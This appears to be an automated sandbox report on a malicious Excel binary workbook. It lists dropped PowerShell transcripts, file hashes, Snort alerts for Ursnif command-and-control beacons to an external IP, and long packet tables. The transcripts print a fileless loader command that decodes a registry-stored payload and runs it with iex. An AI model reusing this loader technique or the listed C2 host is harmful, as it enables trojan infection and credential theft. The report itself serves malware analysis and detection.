                                                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            C:\Users\user\Documents\20210708\PowerShell_transcript.632922.jVqfQyN1.20210708154748.txt
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):976
                                                                                                                                                            Entropy (8bit):5.493748444770493
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:BxSAIxvBnkx2DOXUWOLCHGIYBtBCWnHjeTKKjX4CIym1ZJXgPOLCHGIYBtBW:BZcvhkoORFeVnqDYB1Z2pFeW
                                                                                                                                                            MD5:D3EB7CE30813D194C9F4EA29241E921B
                                                                                                                                                            SHA1:09ED495F6254C8953B08B5B87C0FDCF74ED0E5BD
                                                                                                                                                            SHA-256:3EBEBB577CB48D71A54F92CD0AE010EA1A6FFB63E1CF7EC709C082F8CAC3BD18
                                                                                                                                                            SHA-512:9986FE5500C18B9C1419EF4DAB022B54841210C36C2200EA0C5A1FCDB52B039D9C8FB569986B524337937125E055B8C870A3884D5011E79120A211DBC4100B94
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708154749..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 5196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708154749..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..
                                                                                                                                                            C:\Users\user\Documents\20210708\PowerShell_transcript.632922.yKWYpH3L.20210708154747.txt
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):976
                                                                                                                                                            Entropy (8bit):5.493694549039648
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:BxSAHxvBnkx2DOXUWOLCHGIYBtBCWnHjeTKKjX4CIym1ZJXlfOLCHGIYBtBW:BZRvhkoORFeVnqDYB1ZFFeW
                                                                                                                                                            MD5:612AD7F724C061422CF854B63D07DF41
                                                                                                                                                            SHA1:9161E0269B69126C661C4E17A976C48422F04F71
                                                                                                                                                            SHA-256:60BAE5142EF45D769D43A72D3BC5E898389D215B79706141ED01ED8F218CD4F2
                                                                                                                                                            SHA-512:034CDEB81071B59FEBAC13D2438DA3CDE4D6B0C112825704A72DFDF43F0F77E97E3C73FEE790FD3762A4D60A49DCBCB734BBBD4AA62C8ABE7A1042226D119A96
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708154748..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708154748..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                            Entropy (8bit):7.959986621336663
                                                                                                                                                            TrID:
                                                                                                                                                            • Excel Microsoft Office Binary workbook document (47504/1) 49.73%
                                                                                                                                                            • Excel Microsoft Office Open XML Format document (40004/1) 41.88%
                                                                                                                                                            • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                            File name:documentation_39236.xlsb
                                                                                                                                                            File size:213949
                                                                                                                                                            MD5:31ed7b3f7d7173afe801858e30c0fb62
                                                                                                                                                            SHA1:40376b923682dc858806071f97cb64f781142dbb
                                                                                                                                                            SHA256:8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843
                                                                                                                                                            SHA512:0384ab9e41873f5a3e669f4483f7325c66b2978d47bc1285b30a0e26dd34e748fd2f96539781299b159ae402a0d503ccd44ac5f091fc073d5e476c20483968f4
                                                                                                                                                            SSDEEP:3072:GPLcNfKSwCj4DzTB4uN5+8eV6hwIVFvnQCa5wrNvNppmWDzVXImozZHMXe+8ftJ8:dd73uNs7DIrPZPNflV+sOdftJ6Twg5
                                                                                                                                                            File Content Preview:PK...........R................docProps/PK..........!.S-..............docProps/app.xml.SMO.1..W...|'.....1....""...zg...{..VI.}'K.,.'.........X-+.@B..X.{...\.}X...|rr......b..\........XC".(.".X.D.H)t%,-....R....aZ.X...Ut.K..N..L.. ....;B..8j...yt.}.4_..g..

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            07/08/21-15:46:47.694398TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975580192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:46:47.694398TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975580192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:46:50.491586ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                                                                            07/08/21-15:47:30.909945TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975780192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:30.909945TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975780192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:32.851699TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:35.972897TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976080192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:35.972897TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976080192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:37.855365TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976280192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:37.855365TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976280192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:39.574058TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976180192.168.2.3165.232.183.49
                                                                                                                                                            07/08/21-15:47:39.574058TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.3165.232.183.49

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 8, 2021 15:45:12.662849903 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.796746016 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.796924114 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.798399925 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.931030035 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.933978081 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.934030056 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.934077978 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.934096098 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.934109926 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.934134960 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.934225082 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.935718060 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.935817957 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:12.967597961 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.104223013 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.104317904 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.105153084 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.248893976 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.248975039 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249032974 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249080896 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249090910 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249119997 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249125957 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249151945 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249181986 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249206066 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249224901 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249247074 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249274015 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249296904 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249305010 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249346018 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249361992 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249403000 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.249406099 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.249463081 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.381817102 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.381958961 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.382622957 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.382745981 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383043051 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383093119 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383142948 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383161068 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383173943 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383199930 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383220911 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383240938 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383263111 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383294106 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383301973 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383328915 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383347034 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383368969 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383388996 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383404970 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383415937 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383440018 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383459091 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383476019 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383490086 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383513927 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383539915 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383548975 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383583069 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383585930 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383610010 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383621931 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383662939 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383665085 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383702993 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383706093 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.383730888 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383770943 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.383928061 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.384028912 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.514496088 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.514534950 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.514592886 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.514632940 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.514863014 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.514988899 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.515006065 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.515089035 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.515753984 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.515853882 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.515855074 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.515999079 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.516002893 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516033888 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516074896 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516103029 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.516110897 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516134977 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516168118 CEST49725443192.168.2.3162.241.253.78
                                                                                                                                                            Jul 8, 2021 15:45:13.516169071 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516194105 CEST44349725162.241.253.78192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.516230106 CEST44349725162.241.253.78192.168.2.3

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 8, 2021 15:44:58.490741014 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:44:58.504507065 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:44:59.104778051 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:44:59.117650986 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:00.775324106 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:00.790585995 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:01.689548969 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:01.705452919 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:02.469089985 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:02.482681036 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:03.527302027 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:03.540301085 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:06.538055897 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:06.550508022 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:09.247096062 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:09.259601116 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:10.368503094 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:10.400414944 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:10.415256023 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:10.429045916 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:10.845033884 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:10.883271933 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:11.838382959 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:11.888166904 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.376907110 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:12.393397093 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.538357973 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:12.660362959 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.854002953 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:12.867439032 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.438555956 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:13.454149008 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:14.180490971 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:14.193964958 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:14.822968960 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:14.839948893 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:15.020694971 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:15.035990000 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:15.725830078 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:15.739042997 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:16.612771034 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:16.626346111 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:17.311503887 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:17.325329065 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:18.037586927 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:18.050470114 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:18.873898983 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:18.888286114 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:30.429289103 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:30.458503962 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:35.873209953 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:35.913908958 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:49.567156076 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:49.600656986 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:52.997692108 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:53.013279915 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:53.949455023 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:53.963741064 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:55.503710032 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:55.517919064 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:00.317193031 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:00.336724997 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:01.903301001 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:01.917671919 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:02.294727087 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:02.322993040 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:41.217731953 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:41.231363058 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:44.750526905 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:44.764513016 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:46.216243029 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:47.222793102 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:47.505951881 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:50.491420984 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:14.720967054 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:14.736998081 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:15.708970070 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:15.723954916 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:16.734513044 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:16.746998072 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:18.739809990 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:18.753375053 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:22.756377935 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:22.769054890 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:29.490900993 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:29.511019945 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:30.710268974 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:30.725452900 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:32.668920040 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:32.682585955 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:35.493366003 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:35.783593893 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:37.660630941 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:37.674045086 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:53.472146034 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:53.487234116 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:54.789647102 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:54.805146933 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:55.719249964 CEST5535953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:55.732538939 CEST53553598.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:56.673897028 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:56.686563969 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:57.634944916 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:57.648574114 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:58.478595018 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:58.491975069 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:59.530437946 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:59.543267965 CEST53631508.8.8.8192.168.2.3

                                                                                                                                                            ICMP Packets

                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                            Jul 8, 2021 15:46:50.491585970 CEST192.168.2.38.8.8.8d004(Port unreachable)Destination Unreachable

                                                                                                                                                            DNS Queries

